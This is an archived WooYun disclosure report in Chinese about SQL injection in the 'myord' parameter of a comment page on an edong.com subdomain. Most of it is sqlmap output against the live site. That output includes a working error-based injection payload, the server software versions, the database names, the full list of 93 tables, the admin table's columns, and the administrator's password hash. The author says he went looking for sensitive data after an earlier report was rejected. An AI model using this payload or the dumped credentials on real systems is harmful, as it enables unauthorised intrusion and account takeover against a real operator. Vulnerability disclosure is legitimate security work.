乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-08: 细节已通知厂商并且等待厂商处理中 2015-01-13: 厂商已经主动忽略漏洞,细节向公众公开
中国e动网某站SQL注射
上午提交了一个SQL注射漏洞没有通过,说是没有敏感数据,那么就再找一个有敏感数据的吧。另外看厂家前面一些漏洞,要不坐等忽略+修复?http://zzjz2.edong.com/comment/class/index.php?myshownums=30&imageField.x=1&imageField.y=1&mid=&myord=dtime&catid=1&[email protected]字段myord存在注入
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: myord (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: myshownums=30&imageField.x=1&imageField.y=1&mid=&myord=dtime AND (SELECT 9828 FROM(SELECT COUNT(*),CONCAT(0x717a7a7071,(SELECT (CASE WHEN (9828=9828) THEN 1 ELSE 0 END)),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&catid=1&[email protected]---web application technology: Apache, PHP 5.2.17back-end DBMS: MySQL 5.0current user: 'zzjz2phpweb@localhost'available databases [3]:[*] information_schema[*] test[*] zzjz2phpwebDatabase: zzjz2phpweb[93 tables]+--------------------------+| pwn_advs_duilian || pwn_advs_lb || pwn_advs_lbgroup || pwn_advs_link || pwn_advs_linkgroup || pwn_advs_logo || pwn_advs_movi || pwn_advs_pic || pwn_advs_pop || pwn_advs_text || pwn_base_admin || pwn_base_adminauth || pwn_base_adminmenu || pwn_base_adminrights || pwn_base_border || pwn_base_coltype || pwn_base_config || pwn_base_pageset || pwn_base_pagetemp || pwn_base_plus || pwn_base_plusdefault || pwn_base_plusplan || pwn_base_plusplanid || pwn_base_plustemp || pwn_base_version || pwn_comment || pwn_comment_cat || pwn_comment_config || pwn_down_cat || pwn_down_con || pwn_down_config || pwn_down_downlog || pwn_down_pages || pwn_down_pcat || pwn_down_proj || pwn_down_prop || pwn_maq || pwn_maq_cat || pwn_maq_config || pwn_member || pwn_member_buylist || pwn_member_cat || pwn_member_centlog || pwn_member_centrule || pwn_member_centset || pwn_member_config || pwn_member_defaultrights || pwn_member_fav || pwn_member_friends || pwn_member_group || pwn_member_msn || pwn_member_notice || pwn_member_nums || pwn_member_onlinepay || pwn_member_pay || pwn_member_paycenter || pwn_member_regstep || pwn_member_rights || pwn_member_secure || pwn_member_type || pwn_member_zone || pwn_menu || pwn_menu_group || pwn_news_cat || pwn_news_con || pwn_news_config || pwn_news_downlog || pwn_news_pages || pwn_news_pcat || pwn_news_proj || pwn_news_prop || pwn_page || pwn_page_group || pwn_tools_code || pwn_tools_photopolldata || pwn_tools_photopollindex || pwn_tools_pollconfig || pwn_tools_polldata || pwn_tools_pollindex || pwn_tools_statbase || pwn_tools_statcome || pwn_tools_statcount || pwn_tools_statdate || pwn_webmall_config || pwn_webmall_goods || pwn_webmall_iorder || pwn_webmall_modules || pwn_webmall_spool || pwn_webmall_spoolmod || pwn_webmall_tempcat || pwn_webmall_temptype || pwn_webmall_tmod || pwn_webmall_torder |+--------------------------+Table: pwn_base_admin[7 columns]+----------+-------------+| Column | Type |+----------+-------------+| user | varchar(30) || id | int(6) || job | varchar(50) || jobid | varchar(20) || moveable | int(1) || name | varchar(50) || password | varchar(50) |+----------+-------------+
user name passwordadmin 系统管理员 d12fda0e46f3a79a8009073817b1b89c
其他就不看了。
见上。
……
危害等级:无影响厂商忽略
忽略时间:2015-01-13 17:24
暂无